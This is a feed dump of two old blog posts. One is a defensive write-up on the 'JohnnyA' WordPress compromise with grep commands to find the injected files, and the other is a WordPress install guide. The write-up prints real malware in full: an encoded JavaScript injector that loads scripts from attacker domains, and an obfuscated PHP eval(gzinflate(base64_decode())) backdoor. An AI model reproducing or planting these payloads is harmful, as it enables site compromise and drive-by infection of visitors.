UH.LEE.KA » WordPress http://www.uhleeka.com/blog If you think nobody cares about you, try missing a few car payments. Wed, 25 Aug 2010 01:35:57 +0000 en hourly 1 JohnnyA WordPress malware on MediaTemple http://www.uhleeka.com/blog/2010/07/johnnya-wordpress-malware-on-mediatemple/ http://www.uhleeka.com/blog/2010/07/johnnya-wordpress-malware-on-mediatemple/#comments Wed, 14 Jul 2010 21:03:56 +0000 uhleeka http://www.uhleeka.com/blog/?p=529

My MediaTemple (gs) account got hit by JohnnyA a couple weeks ago. I assume that it occurred because I was slow to update my WordPress to version 3.0. Lucky for me, I actually looked at my blog only 4 days (yikes!) after the exploit occurred. Avast caught the site attempting some sort of JavaScript exploit, which clued me in to the problem.

After digging through the site using Firefox and the Firebug plugin, I found the offending JavaScript and stumbled upon the WordPress Administrative user, “JohnnyA”. So I deleted the code from the file and disabled the database user, only to have the exploit reappear less than 24 hours later.

Confused by its reappearence (I had updated WP to the latest version of 3.0), I contacted MediaTemple support. (mt) politely informed me that the problem was mine own and pointed me to this “System Status” link: http://weblog.mediatemple.net/weblog/category/system-incidents/1378-information-about-compromised-sites/, which states in bold “…this is not exploiting any architectural or system vulnerability” which translates to “Fix it yourself or pay someone to do it for you.

Anyhow, noting that an Adminstrator, username JohnnyA, had been created, I searched and stumbled upon this thread: http://wordpress.org/support/topic/421834. Realizing that there was a .php vector to this attack in addition to a .js vector, i opened up an SSH session and grepped through my “domains” directory. After finding and neutralizing the offending .php file and offending .js file, the site was back to normal and has been malware free for the last 48 hours.

I have since been passively monitoring my site with a plugin called “WordPress File Monitor” which fires off an email every time a file is modified on the site. Hopefully, that will provide an alert of future exploits. I have also installed several other security-related Plugins. Check out http://digwp.com/2010/07/wordpress-security-lockdown/ for a good rundown on WordPress security.

Bottom line, MediaTemple is not at all to blame for this. If I was to exploit a WordPress vulnerability, I would target hosting companies like MediaTemple for the sheer number of (un)managed WordPress installations. Lesson learned? Keep your software up to date!

Edit (2010-07-30): After further looking into this, it appears, IMHO, that MediaTemple (gs) architecture may be at fault. They have acknowledged that there were some sort of permissions issues that allowed neighboring (gs) accounts to read each others data. So they implemented Access Control Lists as a fix (http://weblog.mediatemple.net/weblog/category/system-incidents/1408-gs-grid-service-cluster-issues/). Reading between the lines, something (?) was wrong and MediaTemple took steps to fix it. Transparency? Not really.

The new bottom line is: Something happened to compromise my (gs).
Lesson learned: Don’t issue an opinion based on spoon-fed incident reports. My apologies to WordPress.

Edit (2010-08-06): The comments are well worth reading.


If you are interested in fixing things yourself, here are the steps I took for my MediaTemple (gs) account:

BACKUP!

I take no reponsibility for the following steps. They worked for me, but there is zero guarantee that they will work for you. Backup or no backup, what you do is at your own risk.

SSH

Change directory to your “domains” directory so that you can recursively grep all websites within.

cd ~/domains

Search for the offending javascript by looking for a “document.write(unescape”.

grep -R "document.write(unescape" *

Note that there may be legit occurrances of this (e.g. google analytics). Look for something similar to the following:

uhleeka.com/html/something/something.js:<ads><script type="text/javascript">var st1 = 0
; document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A
%61%76%61%73%63%72%69%70%74%22%3E%76%61%72%20%61%3D%77%69%6E%64%6F%77%2E%6E%61%76%69%67
%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2C%62%3D%2F%28%79%61%68%6F%6F%7C%73%65%61%72
%63%68%7C%6D%73%6E%62%6F%74%7C%79%61%6E%64%65%78%7C%67%6F%6F%67%6C%65%62%6F%74%7C%62%69
%6E%67%7C%61%73%6B%29%2F%69%2C%63%3D%6E%61%76%69%67%61%74%6F%72%2E%61%70%70%56%65%72%73
%69%6F%6E%3B%20%69%66%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2E%69%6E%64%65%78
%4F%66%28%22%77%61%74%63%68%74%69%6D%65%22%29%3D%3D%2D%31%26%26%21%61%2E%74%6F%4C%6F%77
%65%72%43%61%73%65%28%29%2E%6D%61%74%63%68%28%62%29%26%26%63%2E%74%6F%4C%6F%77%65%72%43
%61%73%65%28%29%2E%69%6E%64%65%78%4F%66%28%22%77%69%6E%22%29%21%3D%2D%31%29%7B%76%61%72
%20%64%3D%5B%22%65%64%69%73%6F%6E%73%6E%69%67%68%74%63%6C%75%62%2E%63%6F%6D%22%2C%22%67
%61%69%6E%64%69%72%65%63%74%6F%72%79%2E%6F%72%67%22%2C%22%69%64%65%61%63%6F%72%65%70%6F
%72%74%61%6C%2E%63%6F%6D%22%2C%22%6B%61%72%65%6E%65%67%72%65%6E%2E%63%6F%6D%22%5D%2C%65
%3D%5B%22%61%71%75%61%2E%22%2C%22%61%7A%75%72%65%2E%22%2C%22%62%6C%61%63%6B%2E%22%2C%22
%62%6C%75%65%2E%22%2C%22%62%72%6F%77%6E%2E%22%2C%22%63%68%6F%63%6F%6C%61%74%65%2E%22%2C
%22%63%6F%72%61%6C%2E%22%2C%22%63%79%61%6E%2E%22%2C%22%64%61%72%6B%72%65%64%2E%22%2C%22
%66%75%63%68%73%69%61%2E%22%2C%22%67%6F%6C%64%2E%22%2C%22%67%72%61%79%2E%22%2C%22%67%72
%65%65%6E%2E%22%2C%22%69%6E%64%69%67%6F%2E%22%2C%22%69%76%6F%72%79%2E%22%2C%22%6B%68%61
%6B%69%2E%22%2C%22%6C%69%6D%65%2E%22%2C%22%6D%61%67%65%6E%74%61%2E%22%2C%22%6D%61%72%6F
%6F%6E%2E%22%2C%22%6E%61%76%79%2E%22%2C%22%6F%6C%69%76%65%2E%22%2C%22%6F%72%61%6E%67%65
%2E%22%2C%22%70%69%6E%6B%2E%22%2C%22%70%6C%75%6D%2E%22%2C%22%70%75%72%70%6C%65%2E%22%2C
%22%72%65%64%2E%22%2C%22%73%69%6C%76%65%72%2E%22%2C%22%73%6E%6F%77%2E%22%2C%22%76%69%6F
%6C%65%74%2E%22%2C%22%77%68%69%74%65%2E%22%2C%22%79%65%6C%6C%6F%77%2E%22%5D%2C%66%3D%4D
%61%74%68%2E%66%6C%6F%6F%72%28%4D%61%74%68%2E%72%61%6E%64%6F%6D%28%29%2A%20%64%2E%6C%65
%6E%67%74%68%29%2C%67%3D%4D%61%74%68%2E%66%6C%6F%6F%72%28%4D%61%74%68%2E%72%61%6E%64%6F
%6D%28%29%2A%65%2E%6C%65%6E%67%74%68%29%3B%64%74%3D%6E%65%77%20%44%61%74%65%3B%64%74%2E
%73%65%74%54%69%6D%65%28%64%74%2E%67%65%74%54%69%6D%65%28%29%2B%39%30%37%32%45%34%29%3B
%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3D%22%77%61%74%63%68%74%69%6D%65%3D%22%2B
%65%73%63%61%70%65%28%22%77%61%74%63%68%74%69%6D%65%22%29%2B%22%3B%65%78%70%69%72%65%73
%3D%22%2B%64%74%2E%74%6F%47%4D%54%53%74%72%69%6E%67%28%29%2B%22%3B%70%61%74%68%3D%2F%22
%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%73%63%72%69%70%74%20%74%79%70%65
%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A
%2F%2F%27%2B%65%5B%67%5D%2B%64%5B%66%5D%2B%27%2F%64%61%74%61%2F%6D%6F%6F%74%6F%6F%6C%73
%2E%6A%73%22%3E%3C%5C%2F%73%63%72%69%70%74%3E%27%29%7D%3B%3C%2F%73%63%72%69%70%74%3E'))
;var gr0=0;</script></ads></body>

In case you are interested, the above translates to the following which tries to open a malicious “mootools” javascript on a remote domain:

<script type="text/javascript">
var a = window.navigator.userAgent,
    b = /(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,
    c = navigator.appVersion;
if (document.cookie.indexOf("watchtime") == -1 && !a.toLowerCase().match(b) && 
	c.toLowerCase().indexOf("win") != -1) {
    var d = ["edisonsnightclub.com", "gaindirectory.org", "ideacoreportal.com", 
		"karenegren.com"],
        e = ["aqua.", "azure.", "black.", "blue.", "brown.", "chocolate.", "coral.", 
		"cyan.", "darkred.", "fuchsia.", "gold.", "gray.", "green.", "indigo.", 
		"ivory.", "khaki.", "lime.", "magenta.", "maroon.", "navy.", "olive.", 
		"orange.", "pink.", "plum.", "purple.", "red.", "silver.", "snow.", 
		"violet.", "white.", "yellow."],
        f = Math.floor(Math.random() * d.length),
        g = Math.floor(Math.random() * e.length);
    dt = new Date;
    dt.setTime(dt.getTime() + 9072E4);
    document.cookie = "watchtime=" + escape("watchtime") + ";expires=" + 
		dt.toGMTString() + ";path=/";
    document.write('<script type="text/javascript" src="http://' + e[g] + d[f] + 
		'/data/mootools.js"><\/script>')
};	
</script>

Once you have found the offending javascript malware, remove it from the file. Make sure that you only remove the “bad” part (e.g. don’t delete the <body> tag or anything else adjacent).

Next step is to look for the .php malware. The following looks for a character string longer than 255 (somewhat arbitrary number) within all .php files:

grep -iR --include "*.php" "[a-zA-Z0-9\/\+]\{255,\}" *

You should get back something similar to:

uhleeka.com/html/something/something.php:<?php $o = '1RqLcptI8lcIpQrgSAj0shVZtnNZZ9dVSZ
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';eval("\x65\x76\x61\x6C\x28\x67\x7
A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x
28\x24\x6F\x29\x29\x29\x3B"); ?>

This line of code is the core of the malware and another piece to be deleted. It allows the bot or hacker to manipulate the contents of the site and execute queries against the database.

Of note is the “eval” statement at the end of the line, the contents of which translate to:

eval(gzinflate(base64_decode($o)));

So basically, the hacker has encoded and gzip’d a whole mess of code that sits and waits for commands to be executed.

Hopefully (I say “hopefully” because I haven’t had the time to pour over all the code and database to make sure that there isn’t some other vector to this attack) removing the code from those two places and disabling the database user “JohnnyA” is all that is required to restore a little sanity…at least until WordPress exposes its next vulnerability.

]]> http://www.uhleeka.com/blog/2010/07/johnnya-wordpress-malware-on-mediatemple/feed/ 63 How to Install WordPress on MediaTemple (gs) http://www.uhleeka.com/blog/2008/11/how-to-install-wordpress-on-mediatemple-gs/ http://www.uhleeka.com/blog/2008/11/how-to-install-wordpress-on-mediatemple-gs/#comments Wed, 12 Nov 2008 01:08:39 +0000 uhleeka http://www.uhleeka.com/blog/?p=1

After successfully trying the 1-Click Applications installer offered by the MediaTemple (gs) control panel, I decided I would rather know what was going on behind the scenes…not to mention that they have all sorts of warnings saying “DO NOT(!) use the one-click installer to upgrade any…yada yada yada or we will torture small animals to scare you…yadda yadda.”

Although it was a very straightforward process, after having stepped my way through the manual install, I felt inclined to record my paces.

The Files:

The first step is to download and extract the latest files from WordPress.org. Being new to Linux/UNIX, I decided to do things via SSH.  If you are not so inclined, FTP is a simple and viable option that I decline to discuss in this post.

Login to your (gs) via SSH.

Change directory to the domain where you want to install WordPress (e.g. uhleeka.com):

cd ~/domains/uhleeka.com

Download the latest release from WordPress.org:

wget http://wordpress.org/latest.tar.gz

Decompress the archive into the default directory “wordpress” and delete the tar.gz file:

tar xvzf latest.tar.gz
rm latest.tar.gz

Make the “wordpress” directory a subdirectory called “blog” (e.g. uhleeka.com/blog):

mv wordpress html/blog

Or put the contents of the wordpress folder into the root directory (e.g. uhleeka.com/):

mv wordpress/* html
rm -dr wordpress

The Database:

Creating the database cannot be done via SSH because the (gs) MySQL user does not have CREATE DATABASE permissions. So, you have to use the MediaTemple control panel which is, thankfully, very simple and straightforward.

Once you login to your (gs) contol panel, click the “Manage Databases” link.

Click the “Add A Database” tab.

Specify the database name (e.g. dbXXXX_uhleeka_com) and select MySQL for the type.

Now that you’ve created your database, click the “Global Settings” tab to create a new user for your database (e.g. dbXXXX_uhleeka).  Make sure to give your new user “Read/Write” access to your database.

Also, take note of the “Internal Hostname” listed under “Your Server Info”.  It should be something like “internal-db.sXXXX.gridserver.com”.

The Configuration:

The last thing you will need to do is access and configure your new WordPress blog.  Browse to the home page, and you will be directed to the configuration.  Enter the following fields in the configuration, and you are done:

Database Name: dbXXXX_uhleeka_com
User Name: dbXXXX_uhleeka
Password: ThisIsMyVerySecurePassword
Database Host: internal-db.sXXXX.gridserver.com
Table Prefix: wp_
]]> http://www.uhleeka.com/blog/2008/11/how-to-install-wordpress-on-mediatemple-gs/feed/ 0